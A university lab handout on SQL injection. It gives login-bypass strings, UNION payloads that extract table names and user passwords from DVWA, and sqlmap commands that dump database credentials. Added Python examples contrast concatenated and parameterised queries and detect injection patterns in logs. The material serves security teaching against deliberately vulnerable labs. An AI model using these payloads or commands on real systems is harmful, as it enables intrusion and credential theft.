LAB - Chapter 9 - Database Security


15/10/2024

Lecturer: Nguyễn Thị Thanh Vân – FIT - HCMUTE

 SQL Injection attacks
o Examples
 Damn Vulnerable Web App – DVWA
o Examples
 Sqlmap
o Examples


 SQL injection can do more harm than just bypassing the login
logic. Some of the attacks include:
o Deleting data
o Updating data
o Inserting data
o Executing commands on the server that can download and
install malicious programs such as Trojans
o Exporting valuable data such as credit card details, email, and
passwords to the attacker’s remote server
o Getting user login details, etc.


 Crack username/password
o SQL query:
SELECT * FROM Users WHERE Username='$username' AND
Password='$password'

o Type:
$username = 1' or '1' = '1
$password = 1' or '1' = '1

o The query will be:

SELECT * FROM Users WHERE Username='1' OR '1' = '1'
AND Password='1' OR '1' = '1'
 => always true (OR 1=1): AND binds tighter than OR, so the trailing
OR '1' = '1' makes the whole condition true => the system authenticates
the user without knowing a valid username and password.
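As an added example (not from the slides), the login query above built by string concatenation, next to a parameterised version, run against a constructed in-memory SQLite table so the effect of the payload can be observed; the table, the admin row and its password are assumptions.

```python
import sqlite3

# Constructed in-memory stand-in for the Users table on the slide (not DVWA's schema).
def setup_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (Username TEXT, Password TEXT)")
    db.execute("INSERT INTO Users VALUES ('admin', 'S3cret!')")
    return db

def build_vulnerable_sql(username, password):
    """Builds the statement exactly as the slide does: raw input spliced into SQL text."""
    return ("SELECT * FROM Users WHERE Username='" + username
            + "' AND Password='" + password + "'")

def login_vulnerable(db, username, password):
    """Login check with string concatenation; quotes in the input alter the WHERE clause."""
    return db.execute(build_vulnerable_sql(username, password)).fetchall()

def login_safe(db, username, password):
    """Same check with a parameterised query: the driver binds the values as data,
    so the payload is compared literally against the Username column and matches nothing."""
    sql = "SELECT * FROM Users WHERE Username=? AND Password=?"
    return db.execute(sql, (username, password)).fetchall()

PAYLOAD = "1' or '1' = '1"   # the input from the slide, used for both fields

def demo():
    """Row counts returned by each variant for real credentials and for the payload."""
    db = setup_db()
    return {
        "vulnerable_real": len(login_vulnerable(db, "admin", "S3cret!")),
        "vulnerable_payload": len(login_vulnerable(db, PAYLOAD, PAYLOAD)),
        "safe_real": len(login_safe(db, "admin", "S3cret!")),
        "safe_payload": len(login_safe(db, PAYLOAD, PAYLOAD)),
    }

if __name__ == "__main__":
    print(build_vulnerable_sql(PAYLOAD, PAYLOAD))
    for name, rows in demo().items():
        print(f"{name}: {rows} row(s)")
```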


 SQL query:
SELECT * FROM products WHERE id_product=$id_product
Ex:
http://www.example.com/product.php?id=10

 Using the operators AND and OR (the id value is not quoted, so the
injected condition is appended directly to the query):
SELECT * FROM products WHERE id_product=10 AND 1=2
Ex:
http://www.example.com/product.php?id=10 AND 1=2
=> no content is available, or a blank page.

 Then send a true statement and check whether a valid result comes back:
Ex: http://www.example.com/product.php?id=10 AND 1=1


 Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application
that is damn vulnerable. Its main goal is to be an aid for security
professionals to test
 1.1 Download DVWA
 1.2 Create the database and user for DVWA
 1.3 Configure DVWA
 1.4 Set up the basic database in DVWA
 1.5 Access DVWA
http://10.0.0.2/login.php
 Set the DVWA security level: Low, Medium, High
o SQL Injection
o SQL Injection (Blind)


 Basic injection: 1
 Always-true scenario: %' or '0'='0
 Display the database version:
o %' or 0=0 union select null, version() #
 Display the database user:
o %' or 0=0 union select null, user() #
 Display the database name:
o %' or 0=0 union select null, database() #
 Display all tables listed in information_schema:
o %' and 1=0 union select null, table_name from
information_schema.tables #


 Display all user tables listed in information_schema:
o %' and 1=0 union select null, table_name from
information_schema.tables where table_name like 'user%'#
 Display all column names of the users table (from
information_schema.columns):
o %' and 1=0 union select null,
concat(table_name,0x0a,column_name) from
information_schema.columns where table_name = 'users' #
 Display the contents of those columns in the users table:
o %' and 1=0 union select null,
concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from
users #
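An added detection example, not part of the slides, covering both the boolean-based AND 1=2 / AND 1=1 test shown earlier and the UNION payloads listed above: it URL-decodes the query strings of constructed access-log lines in Combined Log Format, flags the injection shapes, and lists clients with repeated hits; the log lines, client addresses and paths are constructed.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Payload shapes from the slides, matched against the decoded, lowercased parameter
# value: "AND 1=2" boolean tests, quoted tautologies like "' or '1'='1", UNION SELECT.
SIGNATURES = [
    ("boolean", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+")),
    ("tautology", re.compile(r"'\s*(or|and)\s*'[^']*'\s*=\s*'")),
    ("union", re.compile(r"\bunion\s+(all\s+)?select\b")),
]
# Combined Log Format prefix: client ident user [time] "METHOD target HTTP/x" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def classify(value):
    """Names of every signature matching one decoded parameter value."""
    return [name for name, rx in SIGNATURES if rx.search(" ".join(value.lower().split()))]

def analyze_log(text):
    """Report each request whose query-string parameters look like SQL injection."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _method, target, status = m.groups()
        parts = urlsplit(target)
        # parse_qsl percent-decodes and turns '+' into spaces, as the web server would
        for param, value in parse_qsl(parts.query, keep_blank_values=True):
            kinds = classify(value)
            if kinds:
                findings.append({"client": client, "path": parts.path, "param": param,
                                 "value": value, "kinds": kinds, "status": int(status)})
    return findings

def flag_clients(findings, threshold=2):
    """Clients with repeated hits: the 1=2 / 1=1 pair of a blind test, or a tool run."""
    counts = Counter(f["client"] for f in findings)
    return {ip for ip, n in counts.items() if n >= threshold}

# Constructed sample lines (not real traffic) carrying the slide payloads URL-encoded.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Oct/2024:10:01:02 +0700] "GET /product.php?id=10 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [15/Oct/2024:10:01:09 +0700] "GET /product.php?id=10%20AND%201=2 HTTP/1.1" 200 31 "-" "Mozilla/5.0"
10.0.0.7 - - [15/Oct/2024:10:01:11 +0700] "GET /product.php?id=10%20AND%201=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [15/Oct/2024:10:02:30 +0700] "GET /dvwa/vulnerabilities/sqli/?id=%25%27+or+0%3D0+union+select+null%2C+version%28%29+%23&Submit=Submit HTTP/1.1" 200 980 "-" "Mozilla/5.0"
"""
if __name__ == "__main__":
    print(analyze_log(SAMPLE_LOG), flag_clients(analyze_log(SAMPLE_LOG)))
```

The clean request from 10.0.0.5 produces no finding, while the true/false pair and the UNION request from 10.0.0.7 are reported and that client is flagged.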


 Get important information from the DVWA database (user/pass)
at each security level:
o Low
o Medium
o High


 sqlmap is an open source penetration testing tool that automates
the process of
o detecting and exploiting SQL injection flaws
o taking over database servers.
 It comes with a kick-ass detection engine
 Many niche features for the ultimate penetration tester
 A broad range of switches, from
o database fingerprinting,
o to fetching data from the database,
o to accessing the underlying file system and executing commands
on the operating system via out-of-band connections.
 Download and install sqlmap:
http://sqlmap.sourceforge.net/doc/README.html#s1

 Open Firefox and add the Tamper Data add-on to the Tools menu
o Select Tools\Tamper Data
o Start Tamper Data
 Or press F12 to open the browser's developer tools
 Example, shown in DVWA:


 Run SQL injection

 Prepare: tamper with the request
o Copy the Referer URL (Ref)
Ex: "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit"
o Copy the cookie information (Coo)
Ex: "PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low"
 Run sqlmap to obtain the following pieces of information
o Obtain the database user for DVWA. Syntax:
./sqlmap.py -u <Ref> --cookie=<Coo> -b --current-db --current-user
o Ex:
./sqlmap.py -u "http://192.168.1.106/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="PHPSESSID=lpb5g4uss9kp70p8jccjeks621; security=low" -b --current-db --current-user
Answer Y to "Do you want to keep testing?" => Result

 Run sqlmap
o Obtain the database management usernames and passwords. Syntax:
./sqlmap.py -u <Ref> --cookie=<Coo> --string="Surname" --users --passwords
Use dictionary attack? Y
Dictionary location? <Press Enter>
o Obtain the db_hacker database privileges. Syntax:
./sqlmap.py -u <Ref> --cookie=<Coo> -U db_hacker --privileges
o Obtain a list of all databases:
./sqlmap.py -u <Ref> --cookie=<Coo> --dbs
o Obtain the "dvwa" tables and contents:
./sqlmap.py -u <Ref> --cookie=<Coo> -D dvwa --tables
o Obtain the columns of table dvwa.users:
./sqlmap.py -u <Ref> --cookie=<Coo> -D dvwa -T users --columns

 Run sqlmap
o Obtain users and their passwords from table dvwa.users. Syntax:
./sqlmap.py -u <Ref> --cookie=<Coo> -D dvwa -T users -C user,password --dump
Do you want to use the LIKE operator? Y
Recognize possible hash values? Y
What's the dictionary location? <Press Enter>
Use common password suffixes? Y


 Use sqlmap to obtain the following pieces of information:
o A list of database management usernames and passwords
o A list of databases
o A list of tables for a specified database
o A list of users and passwords for a specified database table


1. DVWA: SQL Injection, SQL Injection (Blind) (2)
o Get important information from the DVWA database, such as tables
and user/pass, at each security level: Low, Medium, High
2. Sqlmap: (2)
o Get important information from the DVWA database: tables, user/pass
at each security level: Low, Medium, High
o Database from another website, ex:
• http://testphp.vulnweb.com
3. Other tools: (1)
o Hackbar (built into the web browser) -> vulnerable website.
